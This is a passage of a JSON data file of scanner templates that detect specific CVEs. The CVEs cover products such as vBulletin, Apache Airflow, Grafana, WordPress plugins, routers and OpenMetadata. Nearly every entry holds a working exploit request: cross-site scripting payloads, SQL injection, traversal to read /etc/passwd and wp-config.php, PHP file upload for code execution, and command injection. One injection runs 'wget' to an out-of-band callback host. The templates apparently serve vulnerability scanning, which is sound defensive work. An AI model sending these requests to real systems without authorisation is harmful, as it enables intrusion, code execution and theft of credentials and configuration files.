Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-35713","info":{"name":"Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /goform/setSysAdm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/login.shtml\n\nadmuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-6950","info":{"name":"Eclipse Mojarra - Local File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"<web-app\", \"<servlet>\") || contains_all(body, \"<faces-config\", \"</faces-config>\")"],"condition":"and"}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"raw":["GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body_1), '<svg/onload=alert(document.domain)>')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')","status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"],"condition":"or"}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML feed"]}]},{"raw":["POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-34257","info":{"name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/page/index.html\n\n{\n\"token\":\"\",\n\"apcliEncrypType\":\"`id>../{{file}}.txt`\",\n\"topicurl\":\"setWiFiExtenderConfig\"\n}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"success\": true"]},{"type":"regex","part":"body_2","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4879","info":{"name":"ServiceNow UI Macros - Template Injection","severity":"unknown"},"requests":[{"raw":["GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j=\"jelly\"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class=\"outputmsg_text\">1787569</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28255","info":{"name":"OpenMetadata - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(interactsh_protocol, 'dns')","contains(body, \"java.lang.Boolean\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2024-1561","info":{"name":"Gradio 4.3-4.12 - Local File Read","severity":"high"},"requests":[{"raw":["POST /component_server HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"component_id\": \"1\", \"data\": \"{{path}}\", \"fn_name\": \"move_resource_to_block_cache\", \"session_hash\": \"aaaaaaaaaaa\"}\n","GET /file={{download_path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\"?([^\"]+)"]}],"payloads":{"path":["c:\\\\windows\\\\win.ini","/etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5421","info":{"name":"SEH 